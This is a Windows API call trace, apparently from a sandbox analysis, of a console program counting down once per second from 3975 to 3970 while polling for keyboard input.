[0110.067] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0110.067] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fc9
[0110.067] Sleep (dwMilliseconds=0x64)
[0110.240] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0110.240] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fca
[0110.240] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083975") returned 8
[0110.240] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0110.240] __iob_func () returned 0x757a2900
[0110.240] _fileno (_File=0x757a2920) returned 1
[0110.241] _errno () returned 0x5507d8
[0110.241] _get_osfhandle (_FileHandle=1) returned 0x4c
[0110.241] _errno () returned 0x5507d8
[0110.241] GetFileType (hFile=0x4c) returned 0x2
[0110.241] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0110.241] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0110.241] lstrlenW (lpString="\x08\x08\x08\x083975") returned 8
[0110.241] GetConsoleOutputCP () returned 0x1b5
[0110.241] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083975", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0110.241] GetConsoleOutputCP () returned 0x1b5
[0110.241] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083975", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083975", lpUsedDefaultChar=0x0) returned 8
[0110.241] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0110.241] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0110.241] Sleep (dwMilliseconds=0x64)
[0110.386] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0110.386] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fca
[0110.386] Sleep (dwMilliseconds=0x64)
[0110.499] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0110.499] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fca
[0110.499] Sleep (dwMilliseconds=0x64)
[0110.597] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0110.597] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fca
[0110.597] Sleep (dwMilliseconds=0x64)
[0110.706] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0110.707] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fca
[0110.707] Sleep (dwMilliseconds=0x64)
[0110.816] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0110.816] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fca
[0110.816] Sleep (dwMilliseconds=0x64)
[0110.925] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0110.925] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fca
[0110.925] Sleep (dwMilliseconds=0x64)
[0111.034] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0111.034] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fca
[0111.035] Sleep (dwMilliseconds=0x64)
[0111.143] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0111.144] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fca
[0111.144] Sleep (dwMilliseconds=0x64)
[0111.253] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0111.253] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcb
[0111.253] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083974") returned 8
[0111.253] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0111.253] __iob_func () returned 0x757a2900
[0111.253] _fileno (_File=0x757a2920) returned 1
[0111.253] _errno () returned 0x5507d8
[0111.253] _get_osfhandle (_FileHandle=1) returned 0x4c
[0111.253] _errno () returned 0x5507d8
[0111.253] GetFileType (hFile=0x4c) returned 0x2
[0111.253] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0111.254] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0111.254] lstrlenW (lpString="\x08\x08\x08\x083974") returned 8
[0111.254] GetConsoleOutputCP () returned 0x1b5
[0111.254] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083974", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0111.254] GetConsoleOutputCP () returned 0x1b5
[0111.254] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083974", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083974", lpUsedDefaultChar=0x0) returned 8
[0111.254] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0111.254] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0111.254] Sleep (dwMilliseconds=0x64)
[0111.362] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0111.362] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcb
[0111.362] Sleep (dwMilliseconds=0x64)
[0111.471] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0111.471] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcb
[0111.471] Sleep (dwMilliseconds=0x64)
[0111.580] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0111.580] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcb
[0111.580] Sleep (dwMilliseconds=0x64)
[0111.689] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0111.690] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcb
[0111.690] Sleep (dwMilliseconds=0x64)
[0111.799] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0111.799] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcb
[0111.799] Sleep (dwMilliseconds=0x64)
[0111.908] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0111.908] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcb
[0111.908] Sleep (dwMilliseconds=0x64)
[0112.017] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0112.017] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcb
[0112.017] Sleep (dwMilliseconds=0x64)
[0112.126] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0112.126] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcb
[0112.127] Sleep (dwMilliseconds=0x64)
[0112.235] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0112.236] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcc
[0112.236] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083973") returned 8
[0112.236] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0112.236] __iob_func () returned 0x757a2900
[0112.236] _fileno (_File=0x757a2920) returned 1
[0112.236] _errno () returned 0x5507d8
[0112.236] _get_osfhandle (_FileHandle=1) returned 0x4c
[0112.236] _errno () returned 0x5507d8
[0112.236] GetFileType (hFile=0x4c) returned 0x2
[0112.236] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0112.236] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0112.236] lstrlenW (lpString="\x08\x08\x08\x083973") returned 8
[0112.236] GetConsoleOutputCP () returned 0x1b5
[0112.236] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083973", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0112.237] GetConsoleOutputCP () returned 0x1b5
[0112.237] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083973", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083973", lpUsedDefaultChar=0x0) returned 8
[0112.237] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0112.237] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0112.237] Sleep (dwMilliseconds=0x64)
[0112.345] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0112.345] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcc
[0112.345] Sleep (dwMilliseconds=0x64)
[0112.454] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0112.454] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcc
[0112.454] Sleep (dwMilliseconds=0x64)
[0112.563] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0112.563] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcc
[0112.563] Sleep (dwMilliseconds=0x64)
[0112.672] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0112.672] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcc
[0112.672] Sleep (dwMilliseconds=0x64)
[0112.782] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0112.782] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcc
[0112.782] Sleep (dwMilliseconds=0x64)
[0112.891] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0112.891] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcc
[0112.891] Sleep (dwMilliseconds=0x64)
[0113.000] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0113.000] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcc
[0113.000] Sleep (dwMilliseconds=0x64)
[0113.109] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0113.109] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcc
[0113.109] Sleep (dwMilliseconds=0x64)
[0113.218] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0113.219] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcc
[0113.219] Sleep (dwMilliseconds=0x64)
[0113.327] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0113.328] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcd
[0113.328] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083972") returned 8
[0113.328] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0113.328] __iob_func () returned 0x757a2900
[0113.328] _fileno (_File=0x757a2920) returned 1
[0113.328] _errno () returned 0x5507d8
[0113.328] _get_osfhandle (_FileHandle=1) returned 0x4c
[0113.328] _errno () returned 0x5507d8
[0113.328] GetFileType (hFile=0x4c) returned 0x2
[0113.328] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0113.328] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0113.328] lstrlenW (lpString="\x08\x08\x08\x083972") returned 8
[0113.328] GetConsoleOutputCP () returned 0x1b5
[0113.328] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083972", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0113.328] GetConsoleOutputCP () returned 0x1b5
[0113.329] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083972", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083972", lpUsedDefaultChar=0x0) returned 8
[0113.329] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0113.329] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0113.329] Sleep (dwMilliseconds=0x64)
[0113.437] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0113.437] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcd
[0113.437] Sleep (dwMilliseconds=0x64)
[0113.546] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0113.546] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcd
[0113.546] Sleep (dwMilliseconds=0x64)
[0113.656] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0113.656] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcd
[0113.656] Sleep (dwMilliseconds=0x64)
[0113.765] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0113.765] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcd
[0113.765] Sleep (dwMilliseconds=0x64)
[0113.873] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0113.874] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcd
[0113.874] Sleep (dwMilliseconds=0x64)
[0113.990] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0113.990] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcd
[0113.990] Sleep (dwMilliseconds=0x64)
[0114.092] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0114.092] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcd
[0114.092] Sleep (dwMilliseconds=0x64)
[0114.201] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0114.201] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcd
[0114.201] Sleep (dwMilliseconds=0x64)
[0114.310] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0114.310] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fce
[0114.310] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083971") returned 8
[0114.310] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0114.311] __iob_func () returned 0x757a2900
[0114.311] _fileno (_File=0x757a2920) returned 1
[0114.311] _errno () returned 0x5507d8
[0114.311] _get_osfhandle (_FileHandle=1) returned 0x4c
[0114.311] _errno () returned 0x5507d8
[0114.311] GetFileType (hFile=0x4c) returned 0x2
[0114.311] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0114.311] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0114.311] lstrlenW (lpString="\x08\x08\x08\x083971") returned 8
[0114.311] GetConsoleOutputCP () returned 0x1b5
[0114.311] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083971", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0114.311] GetConsoleOutputCP () returned 0x1b5
[0114.311] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083971", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083971", lpUsedDefaultChar=0x0) returned 8
[0114.311] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0114.311] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0114.312] Sleep (dwMilliseconds=0x64)
[0114.420] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0114.420] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fce
[0114.420] Sleep (dwMilliseconds=0x64)
[0114.529] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0114.529] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fce
[0114.529] Sleep (dwMilliseconds=0x64)
[0114.638] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0114.638] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fce
[0114.638] Sleep (dwMilliseconds=0x64)
[0114.747] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0114.747] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fce
[0114.747] Sleep (dwMilliseconds=0x64)
[0114.856] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0114.856] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fce
[0114.856] Sleep (dwMilliseconds=0x64)
[0114.965] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0114.966] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fce
[0114.966] Sleep (dwMilliseconds=0x64)
[0115.075] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0115.075] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fce
[0115.075] Sleep (dwMilliseconds=0x64)
[0115.184] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0115.184] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fce
[0115.184] Sleep (dwMilliseconds=0x64)
[0115.293] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0115.293] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcf
[0115.293] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083970") returned 8
[0115.293] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0115.293] __iob_func () returned 0x757a2900
[0115.293] _fileno (_File=0x757a2920) returned 1
[0115.293] _errno () returned 0x5507d8
[0115.293] _get_osfhandle (_FileHandle=1) returned 0x4c
[0115.293] _errno () returned 0x5507d8
[0115.293] GetFileType (hFile=0x4c) returned 0x2
[0115.293] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0115.293] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0115.293] lstrlenW (lpString="\x08\x08\x08\x083970") returned 8
[0115.293] GetConsoleOutputCP () returned 0x1b5
[0115.294] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083970", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0115.294] GetConsoleOutputCP () returned 0x1b5
[0115.294] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083970", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083970", lpUsedDefaultChar=0x0) returned 8
[0115.294] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0115.294] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0115.294] Sleep (dwMilliseconds=0x64)
[0115.402] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0115.402] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcf
[0115.402] Sleep (dwMilliseconds=0x64)
[0115.511] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0115.512] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fcf
[0115.512] Sleep (dwMilliseconds=0x64)
